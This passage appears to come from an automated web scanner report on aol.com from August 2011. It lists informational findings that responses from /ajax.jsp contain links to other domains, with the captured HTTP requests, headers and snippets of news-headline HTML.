<a title="Nivea" name="om_daily-buzz_image_7" class="photo-link lnid-sec8_lnk1" href="http://www.huffingtonpost.com/2011/08/18/nivea-ad-racist_n_930501.html"><img alt="Nivea" src="http://i.huffpost.com/gen/332706/thumbs/a-NIVEA-1-233x155.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline7" href="http://www.huffingtonpost.com/2011/08/18/nivea-ad-racist_n_930501.html" class=" lnid-sec8_lnk3">Is Nivea's Controversial Ad <i>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz8 plid-87561">
<a title="Walmart" name="om_daily-buzz_image_8" class="photo-link lnid-sec9_lnk1" href="http://www.huffingtonpost.com/2011/08/18/monkey-scratches-young-girl_n_930365.html"><img alt="Walmart" src="http://i.huffpost.com/gen/332686/thumbs/a-GIRL-MONKEY-233x155.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline8" href="http://www.huffingtonpost.com/2011/08/18/monkey-scratches-young-girl_n_930365.html" class=" lnid-sec9_lnk3">Watch: Monkey Attacks Girl In Walmart Parking Lot</a>
...[SNIP]...
<a title="Lady Gaga" name="om_daily-buzz_image_9" class="photo-link lnid-sec10_lnk1" href="http://blog.music.aol.com/2011/08/18/lady-gaga-goes-braless-for-vma-promo"><img alt="Lady Gaga" src="http://i.huffpost.com/gen/303009/thumbs/a-GAGA-TWITTER-233x155.jpg"/></a>
...[SNIP]...
</span>
<a target="_blank" class="feedback" href="http://www.opselect.com/ad_feedback/survey.adp?src=115">Ad Feedback</a>
...[SNIP]...
<a id="adchoicelink" name="om_adchoices_link" class="feedback" href="http://adinfo.aol.com/about-our-ads/">Ad Choices<img class="feedback" src="http://portal.aolcdn.com/p5/forms/1245/9db9a9bc-ecd8-4f18-a67c-adc647f55731.jpg"/></a>
...[SNIP]...
<h3><a name="om_custom-content-1_headline" href="http://www.huffingtonpost.com/2011/08/11/kickstart-cleanse-huffpost-aol-challenge_n_922140.html?icid=acm50exclusive082011" class=" lnid-sec2_lnk1">Kick-Start Cleanse Community Challenge</a>
...[SNIP]...
<div class="video-still">
<a alt="" name="om_custom-content-1_image" href="http://www.huffingtonpost.com/2011/08/11/kickstart-cleanse-huffpost-aol-challenge_n_922140.html?icid=acm50exclusive082011"><img height="131" width="131" src="http://portal.aolcdn.com/p5/forms/678/b7783c03-e35d-42ef-9dad-f25c9643bfaa.jpg"/></a>
...[SNIP]...
<b><a href="http://www.huffingtonpost.com/2011/08/11/kickstart-cleanse-huffpost-aol-challenge_n_922140.html?icid=acm50exclusive082011" class=" lnid-sec2_lnk2">Sign up now!</a>
...[SNIP]...
<div class="story">
<a href="http://www.huffingtonpost.com/2011/08/17/christine-odonnell-walks-out-witchcraft_n_929986.html" name="om_trending-stories_img_1" class="lnid-sec1_lnk1 storyimg"><img src="http://i.huffpost.com/gen/331945/thumbs/s-CHRISTINE-ODONNELL-INTERVIEW-WITCHCRAFT-mini.jpg" alt="CHRISTINE ODONNELL INTERVIEW WITCHCRAFT"/></a><p><a href="http://www.huffingtonpost.com/politics" name="om_trending-stories_attr_1" class="lnid-sec1_lnk3 storyattr">Politics</a>: <a href="http://www.huffingtonpost.com/2011/08/17/christine-odonnell-walks-out-witchcraft_n_929986.html" name="om_trending-stories_link_1" class="lnid-sec1_lnk2 storytxt">Christine O'Donnell Walks Out Of CNN Interview</a>
...[SNIP]...
<div class="story">
<a href="http://www.dailyfinance.com/2011/08/17/social-security-mistakenly-declares-thousands-dead-each-year/" name="om_trending-stories_img_2" class="lnid-sec2_lnk1 storyimg"><img src="http://www.blogcdn.com/www.dailyfinance.com/media/2011/08/death-social-security-240cs081711_74x58.jpg" alt=""/></a><p><a href="http://www.dailyfinance.com" name="om_trending-stories_attr_2" class="lnid-sec2_lnk3 storyattr">Daily Finance</a>: <a href="http://www.dailyfinance.com/2011/08/17/social-security-mistakenly-declares-thousands-dead-each-year/" name="om_trending-stories_link_2" class="lnid-sec2_lnk2 storytxt">Social Security Mistakenly Declares Thousands Dead Each Year</a>
...[SNIP]...
<div class="story">
<a href="http://www.huffingtonpost.com/2011/08/18/anderson-cooper-loses-it-giggles-laughter_n_930208.html" name="om_trending-stories_img_3" class="lnid-sec3_lnk1 storyimg"><img src="http://i.huffpost.com/gen/332133/thumbs/s-ANDERSON-COOPER-mini.jpg" alt="ANDERSON COOPER"/></a><p><a href="http://www.huffingtonpost.com/media" name="om_trending-stories_attr_3" class="lnid-sec3_lnk3 storyattr">Media</a>: <a href="http://www.huffingtonpost.com/2011/08/18/anderson-cooper-loses-it-giggles-laughter_n_930208.html" name="om_trending-stories_link_3" class="lnid-sec3_lnk2 storytxt">WATCH: Anderson Cooper LOSES It, Collapses Into Huge Fit Of Giggles</a>
...[SNIP]...
<div class="story">
<a href="http://www.dailyfinance.com/2011/08/16/savings-experiment-get-the-best-bling-for-your-buck-when-buying/" name="om_trending-stories_img_4" class="lnid-sec4_lnk1 storyimg"><img src="http://www.blogcdn.com/www.dailyfinance.com/media/2011/08/diamond-ring-240cs081611-1313425590_74x58.jpg" alt="Diamond Ring"/></a><p><a href="http://www.dailyfinance.com" name="om_trending-stories_attr_4" class="lnid-sec4_lnk3 storyattr">Daily Finance</a>: <a href="http://www.dailyfinance.com/2011/08/16/savings-experiment-get-the-best-bling-for-your-buck-when-buying/" name="om_trending-stories_link_4" class="lnid-sec4_lnk2 storytxt">Savings Experiment: Get the Best Bling for Your Buck When Buying a Diamond Ring</a>
...[SNIP]...
<div class="story">
<a href="http://www.aoltv.com/2011/08/18/la-ink-canceled-by-tlc/" name="om_trending-stories_img_5" class="lnid-sec5_lnk1 storyimg"><img src="http://www.blogcdn.com/www.aoltv.com/media/2011/07/kat-von-d-tlc-la-ink-300_74x58.jpg" alt="TLC has canceled 'LA Ink.'"/></a><p><a href="http://www.aoltv.com" name="om_trending-stories_attr_5" class="lnid-sec5_lnk3 storyattr">AOL TV</a>: <a href="http://www.aoltv.com/2011/08/18/la-ink-canceled-by-tlc/" name="om_trending-stories_link_5" class="lnid-sec5_lnk2 storytxt">'LA Ink' Canceled by TLC</a>
...[SNIP]...
<div class="story">
<a href="http://www.huffingtonpost.com/2011/08/18/abigail-breslin-in-the-class-project_n_930172.html" name="om_trending-stories_img_6" class="lnid-sec6_lnk1 storyimg"><img src="http://i.huffpost.com/gen/332095/thumbs/s-BRESLIN-mini.jpg" alt="BRESLIN"/></a><p><a href="http://www.huffingtonpost.com/celebrity" name="om_trending-stories_attr_6" class="lnid-sec6_lnk3 storyattr">Celebrity</a>: <a href="http://www.huffingtonpost.com/2011/08/18/abigail-breslin-in-the-class-project_n_930172.html" name="om_trending-stories_link_6" class="lnid-sec6_lnk2 storytxt">Abigail Breslin Goes Dark: Teen Mom Murderer</a>
...[SNIP]...
<div class="story last">
<a href="http://www.mmafighting.com/2011/08/17/krzysztof-soszynski-says-at-least-85-percent-of-fighters-defini/" name="om_trending-stories_img_7" class="lnid-sec7_lnk1 storyimg"><img src="http://www.blogcdn.com/www.mmafighting.com/media/2011/08/ksos_74x58.jpg" alt=""/></a><p><a href="http://www.mmafighting.com" name="om_trending-stories_attr_7" class="lnid-sec7_lnk3 storyattr">MMA Fighting</a>: <a href="http://www.mmafighting.com/2011/08/17/krzysztof-soszynski-says-at-least-85-percent-of-fighters-defini/" name="om_trending-stories_link_7" class="lnid-sec7_lnk2 storytxt">Krzysztof Soszynski Says at Least 85 Percent of Fighters 'Definitely Using' PEDs</a>
...[SNIP]...
<div class="aol-twitter-like lnid-sec1_lnk2" id="om_followme_2_follow-me-module">
<a href="http://twitter.com/AOL" data-show-count="false" class="twitter-follow-button followmemodule_TWlike">Follow @AOL</a>
...[SNIP]...
</div>
<a name="om_followme_3" href="http://aol.it/jmiFya" class="nlm lnid-sec1_lnk3 last">Newsletter</a>
...[SNIP]...
<h2><a name="om_featured-blog-posts-feed_title" class="lnid-sec1_lnk1" href="http://www.huffingtonpost.com/theblog/index/">Featured Blog Posts</a>
...[SNIP]...
<div class="about">
<img class="headshot" alt="Bonnie Fuller" src="http://s.huffpost.com/contributors/bonnie-fuller/headshot.jpg"/>
<p class="vertical"><a href="http://www.huffingtonpost.com/entertainment" name="om_featured-blog-rss_sec2_vert" class="lnid-sec2_lnk1">ENTERTAINMENT</a>
...[SNIP]...
<h3 class="headline"><a href="http://www.huffingtonpost.com/bonnie-fuller/kim-kardashian-married_b_930798.html" name="om_featured-blog-rss_sec2_hl" class="headline lnid-sec2_lnk2">Kim Kardashian: 10 Tips to Make Your Marriage Last Forever</a>
...[SNIP]...
<p class="read"><a href="http://www.huffingtonpost.com/bonnie-fuller/kim-kardashian-married_b_930798.html" name="om_featured-blog-rss_sec2_read" class="read lnid-sec2_lnk3">Read Post</a> | <a href="http://www.huffingtonpost.com/bonnie-fuller/kim-kardashian-married_b_930798.html#comments" name="om_featured-blog-rss_sec2_cmnt" class="comments lnid-sec2_lnk4">Comments</a>
...[SNIP]...
<div class="about">
<img class="headshot" alt="Jon M. Sweeney" src="http://s.huffpost.com/contributors/jon-m-sweeney/headshot.jpg"/>
<p class="vertical"><a href="http://www.huffingtonpost.com/religion" name="om_featured-blog-rss_sec3_vert" class="lnid-sec3_lnk1">RELIGION</a>
...[SNIP]...
<h3 class="headline"><a href="http://www.huffingtonpost.com/jon-m-sweeney/lady-gaga-catholic_b_926420.html" name="om_featured-blog-rss_sec3_hl" class="headline lnid-sec3_lnk2">Is Lady Gaga Catholic?</a>
...[SNIP]...
<p class="read"><a href="http://www.huffingtonpost.com/jon-m-sweeney/lady-gaga-catholic_b_926420.html" name="om_featured-blog-rss_sec3_read" class="read lnid-sec3_lnk3">Read Post</a> | <a href="http://www.huffingtonpost.com/jon-m-sweeney/lady-gaga-catholic_b_926420.html#comments" name="om_featured-blog-rss_sec3_cmnt" class="comments lnid-sec3_lnk4">Comments</a>
...[SNIP]...
<div class="about">
<img class="headshot" alt="Melissa Lafsky" src="http://s.huffpost.com/contributors/melissa-lafsky/headshot.jpg"/>
<p class="vertical"><a href="http://www.huffingtonpost.com/women" name="om_featured-blog-rss_sec4_vert" class="lnid-sec4_lnk1">WOMEN</a>
...[SNIP]...
<h3 class="headline"><a href="http://www.huffingtonpost.com/melissa-lafsky/5-truths-about-your-paren_b_930216.html" name="om_featured-blog-rss_sec4_hl" class="headline lnid-sec4_lnk2">5 Truths About Your Parents That No One Tells You</a>
...[SNIP]...
<p class="read"><a href="http://www.huffingtonpost.com/melissa-lafsky/5-truths-about-your-paren_b_930216.html" name="om_featured-blog-rss_sec4_read" class="read lnid-sec4_lnk3">Read Post</a> | <a href="http://www.huffingtonpost.com/melissa-lafsky/5-truths-about-your-paren_b_930216.html#comments" name="om_featured-blog-rss_sec4_cmnt" class="comments lnid-sec4_lnk4">Comments</a>
...[SNIP]...
<a title="Child Preacher" name="om_vidfeat_image1" class="lnid-sec2_lnk1 icid-BTFimage3" href="http://video.aol.com/video/pint-sized-preacher/92871091"><img alt="Child Preacher" src="http://o.aolcdn.com/hss/storage/adam/92353343297a85c42004c42fcbe733d8/pint-sized-preacher.jpg"/></a>
...[SNIP]...
<a title="doughnuts!" name="om_vidfeat_image2" class="lnid-sec3_lnk1 icid-BTFimage1" href="http://video.aol.com/video/how-to-make-homemade-doughnuts/590730756"><img alt="doughnuts!" src="http://o.aolcdn.com/hss/storage/adam/5d60ce9fc3d0b921b344beb563fba9e8/CIA-Class_MG_1804-456.jpg"/></a>
...[SNIP]...
<a title="Flawless skin" name="om_vidfeat_image3" class="lnid-sec4_lnk1 icid-BTFimage2" href="http://video.aol.com/video/flawless-face-how-to-cover-up-acne/2545363948"><img alt="Flawless skin" src="http://o.aolcdn.com/hss/storage/adam/b9a2ef60d3c7ed958f77bf69067923d/flawless-face-how-to-cover-up-acne.jpg"/></a>
...[SNIP]...
<div class="mpid-9">
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=aolcom_cs=1&betq=13668=438747" width="1" height="1" border="0" /> </div>
...[SNIP]...
<span class="mnid-brand-3 plid-75012"><a class="lnid-sec1_lnk1 icid-brandfooter_shoutcast brand62" href="http://www.shoutcast.com/" name="om_brands_shoutcast">Shoutcast</a>
...[SNIP]...
<span class="mnid-brand-4 plid-75014"><a class="lnid-sec1_lnk1 icid-brandfooter_tuaw brand31" href="http://www.tuaw.com/" name="om_brands_tuaw">TUAW</a>
</span><span class="mnid-brand-5 plid-79342"><a class="lnid-sec1_lnk1 icid-brandfooter_gamescom brand18" href="http://www.games.com/" name="om_brands_gamescom">Games.com</a>
...[SNIP]...
<span class="mnid-brand-8 plid-75105"><a class="lnid-sec1_lnk1 icid-brandfooter_boombox brand36" href="http://www.theboombox.com/" name="om_brands_boombox">Boombox</a>
...[SNIP]...
</font><a href="http://bit.ly/btxTZj" class="fb lnid-sec1_lnk9" target="_blank" name="om_followme1">Facebook</a>
...[SNIP]...
</a> | <a href="http://bit.ly/cCSb2K" class="rss lnid-sec1_lnk11" target="_blank" name="om_followme3">RSS</a>
...[SNIP]...
</div>
<script type="text/javascript" src="http://portal.aolcdn.com/p5/_v58.6/js/main.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/videoplayer/loader.js"></script>
<script type="text/javascript" src="http://player.play.it/player/launchAolPlayer.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

6.3. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=14&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl14

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:16:22 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-87.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2610
Set-Cookie: JSESSIONID=EFC69B3359D612748FD2BD602BD34F21; Path=/aol
Content-Length: 2610

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl14 plid-87511 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl14_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl14|sec1_lnk1|87511" href="http://www.huffingtonpost.com/2011/08/18/gary-giordano-insurance_n_930309.html#s326251&amp;title=Robyn_Gardner "><img height="217" width="386" src="http://o.aolcdn.com/hss/storage/adam/b560b19bba6663df5ff514ee58f7010a/giordano-gardner-386cm081811.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl14_hdln" href="http://www.huffingtonpost.com/2011/08/18/gary-giordano-insurance_n_930309.html#s326251&amp;title=Robyn_Gardner " class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl14|sec1_lnk2|87511">Disturbing Development in Aruba Case
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl14_cpy" href="http://www.huffingtonpost.com/2011/08/18/gary-giordano-insurance_n_930309.html#s326251&amp;title=Robyn_Gardner " class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl14|sec1_lnk3|87511">'Beyond pornographic' shots on his camera</a>
...[SNIP]...
<li ><a name="om_dl14_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl14|sec3_lnk1|87511" href="http://www.huffingtonpost.com/2011/08/18/peter-kinder-stripper_n_930427.html ">Gov. Answers Stripper Allegations</a>
...[SNIP]...
<li ><a name="om_dl14_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl14|sec3_lnk2|87511" href="http://www.huffingtonpost.com/2011/08/18/uae-tweeting-rumors-can-result-in-jail-time_n_929351.html?1313679302 ">Twitter Rumors Leads to Jail Time?
</a>
...[SNIP]...
<li ><a name="om_dl14_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl14|sec3_lnk3|87511" href="http://www.huffingtonpost.com/2011/08/18/los-angeles-downgraded-by_n_930296.html ">Major US City Downgraded by S&P
</a>
...[SNIP]...

6.4. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=19&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl19

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:17:17 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-107-91.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2609
Set-Cookie: JSESSIONID=9ABD893C88B5D46CE97808363F775847; Path=/aol
Content-Length: 2609

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl19 plid-87572 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
om_dl19_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl19|sec1_lnk1|87572" href="http://realestate.aol.com/blog/2011/08/18/house-of-the-day-role-play-prez-in-white-house-lookalike/ "><img height="217" width="386" src="http://i.huffpost.com/gen/332727/thumbs/a-WHITE-HOUSE-386x217.jpg"/></a>
...[SNIP]...

6.5. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=16&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl16

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:16:43 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-45.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2467
Set-Cookie: JSESSIONID=BB8D8A2B14F0237DD3134B8746CDEBED; Path=/aol
Content-Length: 2467

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl16 plid-87497 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl16_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl16|sec1_lnk1|87497" href="http://www.huffingtonpost.com/2011/08/18/skype-wedding-dying-mother_n_930134.html"><img height="217" alt="Andrea Coily and Husband" width="386" src="http://o.aolcdn.com/hss/storage/adam/ccad2e1b434371168f2a814bc352065/wedding-386az08182011.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl16_hdln" href="http://www.huffingtonpost.com/2011/08/18/skype-wedding-dying-mother_n_930134.html" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl16|sec1_lnk2|87497">'Most Emotional Ceremony I've Seen'</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl16_cpy" href="http://www.huffingtonpost.com/2011/08/18/skype-wedding-dying-mother_n_930134.html" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl16|sec1_lnk3|87497">So they figured out the next best thing
</a>
...[SNIP]...
<li ><a name="om_dl16_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl16|sec3_lnk1|87497" href="http://www.huffingtonpost.com/2011/08/18/bebe-workwear_n_930391.html">Would You Wear This to Work? </a>
...[SNIP]...
<li ><a name="om_dl16_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl16|sec3_lnk2|87497" href="http://www.stylelist.com/2011/08/18/missoni-for-target-bobby-pins_n_929712.html">New Target Item Put to the Test</a>
...[SNIP]...
<li ><a name="om_dl16_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl16|sec3_lnk3|87497" href="http://www.stylelist.com/2011/08/18/solange-knowles-style_n_930040.html">Solange Knowles in Colorful Outfit </a>
...[SNIP]...

6.6. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=20&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl20

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:17:30 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-83.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2592
Set-Cookie: JSESSIONID=D38C72229768D1BC2C472EAAFBDBB0A9; Path=/aol
Content-Length: 2592

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl20 plid-87417 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl20_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl20|sec1_lnk1|87417" href="http://www.huffingtonpost.com/2011/08/17/yard-sale-medical-bills-jan-cline-cancer_n_929911.html?1313619055"><img height="217" alt="Jan Cline" width="386" src="http://o.aolcdn.com/hss/storage/adam/48579d32e409f517017b94388ca4837a/sale-386az08182011.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl20_hdln" onclick=" " href="http://www.huffingtonpost.com/2011/08/17/yard-sale-medical-bills-jan-cline-cancer_n_929911.html?1313619055" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl20|sec1_lnk2|87417">Cancer Patient's Yard Sales Shuttered</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl20_cpy" href="http://www.huffingtonpost.com/2011/08/17/yard-sale-medical-bills-jan-cline-cancer_n_929911.html?1313619055" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl20|sec1_lnk3|87417">Then she got a notice from the city
</a>
...[SNIP]...
<li ><a name="om_dl20_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl20|sec3_lnk1|87417" href="http://www.huffingtonpost.com/eatingwell/sunburn-remedies_b_924642.html">4 Foods That Soothe a Sunburn</a>
...[SNIP]...
<li ><a name="om_dl20_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl20|sec3_lnk2|87417" href="http://www.huffingtonpost.com/2011/08/17/kids-nut-allergy-teased-excluded_n_929809.html">How Kids With Nut Allergies Feel </a>
...[SNIP]...
<li ><a name="om_dl20_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl20|sec3_lnk3|87417" href="http://www.huffingtonpost.com/2011/08/18/second-language-toddlers_n_929248.html">Toddlers Who May Have an Edge
</a>
...[SNIP]...

6.7. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=13&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl13

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:16:09 GMT
Server: Apache-Coyote/1.1
